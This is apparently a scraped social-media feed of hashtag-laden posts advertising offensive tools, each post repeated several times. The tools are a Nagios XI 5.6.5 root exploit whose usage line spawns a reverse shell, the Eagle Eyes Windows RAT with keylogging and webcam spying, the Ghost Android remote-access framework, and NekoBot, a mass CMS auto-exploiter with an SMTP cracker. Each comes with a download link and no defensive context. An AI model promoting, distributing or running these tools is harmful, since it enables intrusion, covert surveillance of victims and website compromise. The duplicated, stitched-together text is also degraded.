nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to #escalate #privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage #plugins.
A #PHP POC has been developed which #uploads a #payload resulting in a #reverse root shell.
#Usage:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
#Download #Link:-
https://github.com/jakgibb/nagiosxi-root-rce-exploit
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to #escalate #privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage #plugins.
A #PHP POC has been developed which #uploads a #payload resulting in a #reverse root shell.
#Usage:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
#Download #Link:-
https://github.com/jakgibb/nagiosxi-root-rce-exploit
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI
Eagle Eyes:-- Eagle Eyes is a #powerful low-level #TCP #networking #RAT. Supporting #desktop streaming, #webcam streaming, audio listening, #keylogging & more available from its CLI.
Eagle Eyes is a #spyware #Python program created for #Windows that supports multiple ways to collect #data & automatically save everything organized in folders. It has two shells you will use, the first #shell is to control & manage clients & options. It is also from this shell you have can connect to a client session. This will give a reverse shell-like connection to a specific client with extra built-in commands.
#Download #Link:-
https://github.com/Alvin-22/Eagle-Eyes
Eagle Eyes:-- Eagle Eyes is a #powerful low-level #TCP #networking #RAT. Supporting #desktop streaming, #webcam streaming, audio listening, #keylogging & more available from its CLI.
Eagle Eyes is a #spyware #Python program created for #Windows that supports multiple ways to collect #data & automatically save everything organized in folders. It has two shells you will use, the first #shell is to control & manage clients & options. It is also from this shell you have can connect to a client session. This will give a reverse shell-like connection to a specific client with extra built-in commands.
#Download #Link:-
https://github.com/Alvin-22/Eagle-Eyes
Eagle Eyes is a #spyware #Python program created for #Windows that supports multiple ways to collect #data & automatically save everything organized in folders. It has two shells you will use, the first #shell is to control & manage clients & options. It is also from this shell you have can connect to a client session. This will give a reverse shell-like connection to a specific client with extra built-in commands.
#Download #Link:-
https://github.com/Alvin-22/Eagle-Eyes
Eagle Eyes:-- Eagle Eyes is a #powerful low-level #TCP #networking #RAT. Supporting #desktop streaming, #webcam streaming, audio listening, #keylogging & more available from its CLI.
Eagle Eyes is a #spyware #Python program created for #Windows that supports multiple ways to collect #data & automatically save everything organized in folders. It has two shells you will use, the first #shell is to control & manage clients & options. It is also from this shell you have can connect to a client session. This will give a reverse shell-like connection to a specific client with extra built-in commands.
#Download #Link:-
https://github.com/Alvin-22/Eagle-Eyes
Photos from National Cyber Security Services's post
Ghost Framework:-- #Android #post #exploitation #framework that uses an Android Debug Bridge to #remotely access an Android device. #Ghost Framework gives you the power and convenience of #remote Android #device #administration.
Why ghost framework?
1. Accessing device shell
INFO: Ghost Framework can be used to access the remote
Android device #shell without using #OpenSSH or other protocols.
2. Emulating device button presses
INFO: Ghost Framework can be used to emulate
button presses on the remote Android device.
3. Removing device password
INFO: Ghost Framework can be used to remove the
remote Android device #password if it was forgotten.
#Downlaod #Link:-
https://github.com/entynetproject/ghost
Ghost Framework:-- #Android #post #exploitation #framework that uses an Android Debug Bridge to #remotely access an Android device. #Ghost Framework gives you the power and convenience of #remote Android #device #administration.
Why ghost framework?
1. Accessing device shell
INFO: Ghost Framework can be used to access the remote
Android device #shell without using #OpenSSH or other protocols.
2. Emulating device button presses
INFO: Ghost Framework can be used to emulate
button presses on the remote Android device.
3. Removing device password
INFO: Ghost Framework can be used to remove the
remote Android device #password if it was forgotten.
#Downlaod #Link:-
https://github.com/entynetproject/ghost
NekoBot:-- Auto #Exploiter With 500+ #Exploit 2000+ #Shell.
#NekoBot is an auto exploit #tool to facilitate the #penetration of one or many #websites (#Wordpress, #Joomla, #Drupal, #Magento, #Opencart, and Etc).
Features :
[+] Wordpress :
1- Cherry-Plugin
2- download-manager Plugin
3- wysija-newsletters
4- Slider Revolution [#Revslider]
5- gravity-forms
etc.
[+] Joomla
1- Com_adsmanager
2- Com_alberghi
3- Com_CCkJseblod
4- Com_extplorer
5- Com_Fabric
etc.
[+] Drupal :
1- Drupal Add admin geddon1
2- Drupal #RCE geddon2
3- Drupal 8 RCE RESTful
4- Drupal #MailChimp
5- Drupal Php-curl-class
etc.
[+] Magento :
1- Shoplift
2- Magento Default user pass
[+] Oscommerce
1- OsCommerce Core 2.3 RCE Exploit
opencart
[+] OTHER :
1- Env Exploit
2- #SMTP CRACKER
3- CV
#Download #Link:-
https://github.com/tegal1337/NekoBotV1
NekoBot:-- Auto #Exploiter With 500+ #Exploit 2000+ #Shell.
#NekoBot is an auto exploit #tool to facilitate the #penetration of one or many #websites (#Wordpress, #Joomla, #Drupal, #Magento, #Opencart, and Etc).
Features :
[+] Wordpress :
1- Cherry-Plugin
2- download-manager Plugin
3- wysija-newsletters
4- Slider Revolution [#Revslider]
5- gravity-forms
etc.
[+] Joomla
1- Com_adsmanager
2- Com_alberghi
3- Com_CCkJseblod
4- Com_extplorer
5- Com_Fabric
etc.
[+] Drupal :
1- Drupal Add admin geddon1
2- Drupal #RCE geddon2
3- Drupal 8 RCE RESTful
4- Drupal #MailChimp
5- Drupal Php-curl-class
etc.
[+] Magento :
1- Shoplift
2- Magento Default user pass
[+] Oscommerce
1- OsCommerce Core 2.3 RCE Exploit
opencart
[+] OTHER :
1- Env Exploit
2- #SMTP CRACKER
3- CV
#Download #Link:-
https://github.com/tegal1337/NekoBotV1
#NekoBot is an auto exploit #tool to facilitate the #penetration of one or many #websites (#Wordpress, #Joomla, #Drupal, #Magento, #Opencart, and Etc).
Features :
[+] Wordpress :
1- Cherry-Plugin
2- download-manager Plugin
3- wysija-newsletters
4- Slider Revolution [#Revslider]
5- gravity-forms
etc.
[+] Joomla
1- Com_adsmanager
2- Com_alberghi
3- Com_CCkJseblod
4- Com_extplorer
5- Com_Fabric
etc.
[+] Drupal :
1- Drupal Add admin geddon1
2- Drupal #RCE geddon2
3- Drupal 8 RCE RESTful
4- Drupal #MailChimp
5- Drupal Php-curl-class
etc.
[+] Magento :
1- Shoplift
2- Magento Default user pass
[+] Oscommerce
1- OsCommerce Core 2.3 RCE Exploit
opencart
[+] OTHER :
1- Env Exploit
2- #SMTP CRACKER
3- CV
#Download #Link:-
https://github.com/tegal1337/NekoBotV1
NekoBot:-- Auto #Exploiter With 500+ #Exploit 2000+ #Shell.
#NekoBot is an auto exploit #tool to facilitate the #penetration of one or many #websites (#Wordpress, #Joomla, #Drupal, #Magento, #Opencart, and Etc).
Features :
[+] Wordpress :
1- Cherry-Plugin
2- download-manager Plugin
3- wysija-newsletters
4- Slider Revolution [#Revslider]
5- gravity-forms
etc.
[+] Joomla
1- Com_adsmanager
2- Com_alberghi
3- Com_CCkJseblod
4- Com_extplorer
5- Com_Fabric
etc.
[+] Drupal :
1- Drupal Add admin geddon1
2- Drupal #RCE geddon2
3- Drupal 8 RCE RESTful
4- Drupal #MailChimp
5- Drupal Php-curl-class
etc.
[+] Magento :
1- Shoplift
2- Magento Default user pass
[+] Oscommerce
1- OsCommerce Core 2.3 RCE Exploit
opencart
[+] OTHER :
1- Env Exploit
2- #SMTP CRACKER
3- CV
#Download #Link:-
https://github.com/tegal1337/NekoBotV1